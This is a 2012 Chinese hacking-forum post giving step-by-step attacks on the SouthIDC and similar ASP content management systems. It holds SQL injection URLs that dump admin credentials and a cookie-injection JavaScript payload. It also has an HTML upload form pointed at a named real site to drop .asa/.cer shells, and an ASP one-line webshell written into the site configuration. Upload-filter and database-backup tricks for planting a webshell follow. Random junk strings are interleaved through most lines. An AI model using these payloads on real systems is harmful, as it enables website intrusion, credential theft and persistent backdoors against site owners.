找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2434|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
: n8 p) A: a1 U+ Q1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
0 y" o! \7 `: K) M/ V& C* R; l也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
$ J! W( c; I% G: r, h6 T9 o4 h; \8 x直接暴管理员帐号密码(md5)0 Q0 }4 M% j% k% X. |' c9 R
2.登陆后台
0 i) S: A9 U# s3.利用编辑器上传:2 {6 w, u  Z* M2 h; O* e4 I2 Y
访问admin/southidceditor/admin_style.asp
. P2 i0 w7 K8 ~修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
6 k& d" S$ M3 E6 {" C$ |0 g2 y, N: \, F; ]) i- |8 I$ X+ _
========================================* r; V: ~! C- \+ k* R3 Z3 B7 C  H7 r

3 y9 u: w  H3 y) E参考资料整理:
3 `! c8 B! ?0 [; b) O& x南方数据、良精系统、网软天下漏洞利用
) Q. D! x, W! l; g3 O! b
7 g( A) W1 M# t; _3 U; o1、通过upfile_other.asp漏洞文件直接取SHELL  A& a- Z) @9 V: E
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
: d% W. ~1 d  `  [  h. b1 @<HTML><HEAD> $ M; a% L6 K; f% Z: O& X
<META http-equiv=Content-Type content="text/html; charset=gb2312"> 6 {! b1 |* f. o4 i8 S! Z
<STYLE type=text/css>BODY { % K+ a8 A2 ]& ^+ d& {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
" f, z: y5 B. v- ^6 Z" E2 X, y# G}   @' o: }1 j2 B! X& q
.tx1 { 0 [: B& J: m4 n/ A" b. g
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px / u( _' `+ H" H+ V
} + I0 Q' H" v2 x& a% Y, h  R
</STYLE>
4 F* m. d$ k: T6 M<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> 9 t: k9 P1 M0 w6 k
<BODY leftMargin=0 topMargin=0>   P+ G+ `, m* x) }
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post ) ?! m# o; `: c2 e
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
9 C! R$ q' l4 n( r" L1 C<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
/ G1 N: X( O: c  z2 [6 b7 Q$ H7 Y
& Z) F0 [/ W# q+ O) p将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。& D" _0 P1 A* L3 l( j# h
注:此方法通杀南方数据、良精系统、网软天下等
: H' A0 g% ^% q& _! K
* O. s3 V: r, `% q: ~' X2、通过注入秒杀管理员帐号密码,使用如下:) T% P; ?, C5 O4 [: i+ v
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’1 T- ]2 y, s+ z2 r/ i/ Q
以上代码直接暴管理员帐号和密码,取SHELL方法如下:4 R) B; o& Q* z: d: @6 m! Z# U
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’+ C+ ^/ \; ~2 o$ V& W
成功把shell写入http://www.target.com/inc/config.asp
' n, Q" V% I( |+ k* K9 P这里一句话chr(32)密码是“#”$ t% [8 A" ?6 h! B# o
3、cookie注入
- v; y/ s0 z/ n* I# ]5 }清空地址栏,利用union语句来注入,提交:2 ?( _/ J- s' B' i  e- l5 M
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
4 Q; Z; w. M, C, r, Q, T3 J/ C如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?! k; `; M  A& f- m+ Y- ]
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
! i) @7 Z* c. L4 G( j1 ^(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)4 s3 o( T* z& H# B( I, C( N

# `2 L+ g* w1 ^, v/ Q: ]4 a三、后台取SHELL方法总结. y: x, z$ z! T5 \. e, C
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:6 @  [+ S0 L: b9 C% G0 w, O
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,/ }; r8 n- I! }+ h& E; B3 w
这时再打开一句话马的客户端,提交同样得到一个小马
9 a( d! d) h' B9 v(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)/ K3 g! p) O4 X4 g7 B& S5 x* s
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:' x" v# o, q/ Q7 |
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then4 `: b+ l: d5 \: }6 T
EnableUpload=false
- ~# }; g. B. g' @! J  L6 D+ [0 l
end if
8 \6 {! G: {) @if EnableUpload=false then
3 S2 B1 F4 L% h, m. gmsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType. E1 p  O- E7 b! Z4 _
FoundErr=true. G, v. q8 }* v( P, g+ T9 j
end if
: `5 L, k. D4 B0 V/ s  T. A( Y大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:- |. K( [3 M4 r
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)% ]) v, P) A, N( E1 ~  P& e( U
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
  K* }) S1 R& D; w/ Q% v/ b  w/ i$ A; Z4 T: X7 O
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
" Q* I' O; S1 [7 M0 Q4 J, R直接访问备份后的地址,就得到一个webshell9 B6 @" a/ e0 T1 v# Z# J' I9 W+ N
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表